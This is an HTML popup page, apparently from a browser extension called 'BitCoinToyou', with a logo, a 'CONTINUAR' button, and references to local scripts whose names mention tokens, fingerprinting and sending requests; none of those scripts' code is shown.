<!DOCTYPE html>
<html lang="en">
<head>

	
	<title>BitCoinToyou</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->
	<link rel="icon" type="image/png" href="images/icons/favicon.ico"/>	
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="css/main.css">
<!--===============================================================================================-->

<style>

.alert {
  padding: 10px;
  margin-top: 10px;
  margin-bottom: 10px;
  border: 1px solid transparent;
  border-radius: 4px;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #a94442;
}

</style> 
 
 <script src="getToken.js"></script>	
 <script src="getFingerPrint.js"></script>
 <script src="SendRequest.js"></script>	

</head>
<body>
  <div id="secundary" style="display: none">
	<div class="bg-contact2">
		<div class="container-contact2">
			<div class="wrap-contact2">
				<div id="url" style="display: none"></div>
					<img src="images/logo.png" width="100%"  height="100%" style="margin-bottom: 40px; margin-top: -35px;" >
					<img src="images/popupext.png" width="100%"  height="100%" style="margin-bottom: 10px; margin-top: -35px;" >
					<div class="container-contact2-form-btn">
						<div class="wrap-contact2-form-btn">
							<div class="contact2-form-bgbtn"></div>
							<button id="BtnSendWithToken" class="contact2-form-btn">
								CONTINUAR
							</button>
						</div>					
					</div>				
			</div>
		</div>
	</div>
</div>

<!--===============================================================================================-->
	<script src="vendor/jquery/jquery-3.2.1.min.js"></script>	
<!--===============================================================================================-->

	<script src="js/main.js"></script>
	<script src="jquery-3.4.1.min.js"></script>	
	<script src="popup.js"></script>
	<script src="SendBtn.js"></script>			
	<script src="SendBtnWithToken.js"></script>			

</body>
</html>

